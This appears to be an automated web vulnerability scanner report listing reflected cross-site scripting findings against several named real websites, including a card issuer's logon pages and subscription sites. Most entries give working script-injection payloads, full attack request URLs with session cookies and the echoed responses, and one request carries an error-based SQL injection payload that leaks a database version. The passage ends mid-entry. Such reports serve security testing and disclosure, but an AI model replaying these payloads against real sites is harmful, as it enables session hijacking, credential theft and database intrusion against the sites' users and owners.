The value of the priceworkshopid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4821"><script>alert(1)</script>e46068f380d9d7019 was submitted in the priceworkshopid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0&priceworkshopid=d4821"><script>alert(1)</script>e46068f380d9d7019&workshop_alphabet=&discountamount=0&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=¤cyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=94 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Expect: 100-continue Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:46:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 39277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html;charset=ISO- ...[SNIP]... <input name="priceworkshopid" type="hidden" id="priceworkshopid" value="d4821"><script>alert(1)</script>e46068f380d9d7019"> ...[SNIP]...
The value of the workshop_alphabet request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 607d4"><script>alert(1)</script>93a6221e1f64fe6ac was submitted in the workshop_alphabet parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0&priceworkshopid=&workshop_alphabet=607d4"><script>alert(1)</script>93a6221e1f64fe6ac&discountamount=0&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=¤cyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=94 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Expect: 100-continue Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:46:14 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 39277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html;charset=ISO- ...[SNIP]... <input name="workshop_alphabet" type="hidden" id="workshop_alphabet" value="607d4"><script>alert(1)</script>93a6221e1f64fe6ac"> ...[SNIP]...
The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload a1846<ScRiPt>alert(1)</ScRiPt>2e99164033 was submitted in the lc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: application/x-shockwave-flash Cache-Control: private, no-transform, max-age=86400 Expires: Fri, 07 Oct 2011 17:57:34 GMT Content-Length: 4715 Date: Thu, 06 Oct 2011 17:57:34 GMT Server: QS
FWS.k...x.._.........D.....C....?.A....i.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns ...[SNIP]... ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1317923787828_9456a1846<ScRiPt>alert(1)</ScRiPt>2e99164033.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=.. ..........O..............=................@................... . .................R....setUpLoc ...[SNIP]...
The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload aa02e<a%20b%3dc>9a7073630bc was submitted in the lc parameter. This input was echoed as aa02e<a b=c>9a7073630bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: application/x-shockwave-flash Cache-Control: private, no-transform, max-age=86400 Expires: Fri, 07 Oct 2011 17:55:11 GMT Content-Length: 4698 Date: Thu, 06 Oct 2011 17:55:11 GMT Server: QS
FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns ...[SNIP]... ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1317923648570_9194aa02e<a b=c>9a7073630bc.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=.. ..........O..............=................@................... . .................R....setUpLoc ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0767'-alert(1)-'176e182b5ad was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=-11576; path=/; expires=Wed, 04-Jan-2012 17:57:48 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Fri, 07-Oct-2011 17:57:48 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e>W`#*ig^1+<KN9OBmFz.fmaa(>[7i@1>8=/HzC@rEXx>E[2((qi8I37(TlSK/#<2ZWc:tSr=y*(Od$<_TyZVGg1tdA5TnBMqRKueSrKd=JSwjv8TIoweOs6oZ?G(q6DANvH^5Q; path=/; expires=Wed, 04-Jan-2012 17:57:48 GMT; domain=.adnxs.com; HttpOnly Date: Thu, 06 Oct 2011 17:57:48 GMT Content-Length: 2541
function writeJS(doc){ var str=''; str += '<iframe src="http:\/\/view.atdmt.com\/COM\/iview\/334309161\/direct;wi.300;hi.250\/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26redirectURL=b0767'-alert(1)-'176e182b5adhttp%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLsQ3CQAwF0B8C6KSsQWspPvsupmAFdnBwXLMIMzEGQ9BTo7z-TRgAXLSlZ6gRZxhpa51MWUlrZDJft0fXgsP99f1NGPdh1uua3GiRNUmqGM3hSe4e3rbQWaTgCCy3ghOGjxe ...[SNIP]...
The value of the pixel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23745'%3balert(1)//71d60156a95 was submitted in the pixel parameter. This input was echoed as 23745';alert(1)//71d60156a95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the DestPage request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7dada%20a%3db40394ec87f9 was submitted in the DestPage parameter. This input was echoed as 7dada a=b40394ec87f9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the DestPage request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload c0c0e%20a%3dba4515da9f3a was submitted in the DestPage parameter. This input was echoed as c0c0e a=ba4515da9f3a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
POST /myca/logon/us/action?request_type=LogLogonHandler&location=us_logon1 HTTP/1.1 Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&inav=iNavLnkLog Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: online.americanexpress.com Cookie: sroute=655231498.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; SaneID=50.23.123.106-1317933759898191 Content-Length: 660 Expect: 100-continue Accept-Encoding: gzip, deflate
The value of the Face request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c063c"%3balert(1)//32613ae77da was submitted in the Face parameter. This input was echoed as c063c";alert(1)//32613ae77da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /myca/logon/us/en/en_US/common/sorry.jsp?request_type=&Face=en_USc063c"%3balert(1)//32613ae77da&sorted_index=&BPIndex=&ApplID= HTTP/1.1 Referer: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: online.americanexpress.com Cookie: sroute=353241610.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; JSESSIONID=0000BIif0oOD1M470jUzbxFsVz7:14fidvqp5; SaneID=50.23.123.106-1317933767479357 Accept-Encoding: gzip, deflate
The value of the Face request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69e01"><script>alert(1)</script>9ab3c946e96 was submitted in the Face parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /myca/logon/us/en/en_US/common/sorry.jsp?request_type=&Face=en_US69e01"><script>alert(1)</script>9ab3c946e96&sorted_index=&BPIndex=&ApplID= HTTP/1.1 Referer: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: online.americanexpress.com Cookie: sroute=353241610.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; JSESSIONID=0000BIif0oOD1M470jUzbxFsVz7:14fidvqp5; SaneID=50.23.123.106-1317933767479357 Accept-Encoding: gzip, deflate
The value of the Face request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f1c73><script>alert(1)</script>98b579ca4b2 was submitted in the Face parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /myca/logon/us/en/en_US/common/sorry.jsp?request_type=&Face=en_USf1c73><script>alert(1)</script>98b579ca4b2&sorted_index=&BPIndex=&ApplID= HTTP/1.1 Referer: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: online.americanexpress.com Cookie: sroute=353241610.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; JSESSIONID=0000BIif0oOD1M470jUzbxFsVz7:14fidvqp5; SaneID=50.23.123.106-1317933767479357 Accept-Encoding: gzip, deflate
The value of the TPREDIRECT_URL request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d14cb'><script>alert(1)</script>1316182f0d8 was submitted in the TPREDIRECT_URL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 69d59<script>alert(1)</script>59c332be82b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f37cd<script>alert(1)</script>a929a3a3307 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.45. https://secure.wsj-asia.com/subscription/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.wsj-asia.com
Path:
/subscription/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f6e9e<script>alert(1)</script>3a010eeafdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))/f6e9e<script>alert(1)</script>3a010eeafdd%2B' HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: secure.wsj-asia.com Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02 Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 19:32:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 538 Connection: close Content-Type: text/html; charset=UTF-8
<b>Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>3a010eeafdd+'' GROUP BY source' at line 3< ...[SNIP]... lect 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(select @@version),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))/f6e9e<script>alert(1)</script>3a010eeafdd+'' GROUP BY source</b>
The value of the source request parameter is copied into the HTML document as plain text between tags. The payload 24c14<script>alert(1)</script>99041cd2efb was submitted in the source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'24c14<script>alert(1)</script>99041cd2efb HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: secure.wsj-asia.com Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02 Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 19:32:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 391 Connection: close Content-Type: text/html; charset=UTF-8
<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package FROM sourcecode WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(select @@version),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'24c14<script>alert(1)</script>99041cd2efb' GROUP BY source</b>
The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 1b75f<script>alert(1)</script>69889d2229c was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8657"><a>f0f1e94f95c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f08"><a>18ed53035cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24476"><a>c2f856cf4ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9e83"><a>70ef6bfcd76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf3d2"><a>3db8303db4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ec4"><a>c111915f435 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4537c"><a>2aabf8387b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3be7d"><a>3a42925c5b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b05"><a>59d6fcf3f9b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c150"><a>d71f373899f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41bd2"><a>d67ca05e548 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
1.59. http://support.scribd.com/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://support.scribd.com
Path:
/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc43"><script>alert(1)</script>af8f5c3b1da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0c9"><script>alert(1)</script>d497db79da7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 2794c<script>alert(1)</script>19636d8696c was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://techaxcess.com/wp-content/uploads/2011/10/iStock_000017718366XSmall-150x150.jpg2794c<script>alert(1)</script>19636d8696c&h=40&w=40&zc=1 HTTP/1.1 Host: techaxcess.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://techaxcess.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request Date: Thu, 06 Oct 2011 20:51:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Content-Length: 121 Connection: close Content-Type: text/html
file not found /wp-content/uploads/2011/10/iStock_000017718366XSmall-150x150.jpg2794c<script>alert(1)</script>19636d8696c
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b77b7<script>alert(1)</script>8da309aef67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
POST /FTcontrol/b77b7<script>alert(1)</script>8da309aef67 HTTP/1.1 Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2= Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.newsweeksubscriptions.com Content-Length: 784 Expect: 100-continue Accept-Encoding: gzip, deflate
The value of the orderid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c99'%3balert(1)//c14d17d233c436490 was submitted in the orderid parameter. This input was echoed as b1c99';alert(1)//c14d17d233c436490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
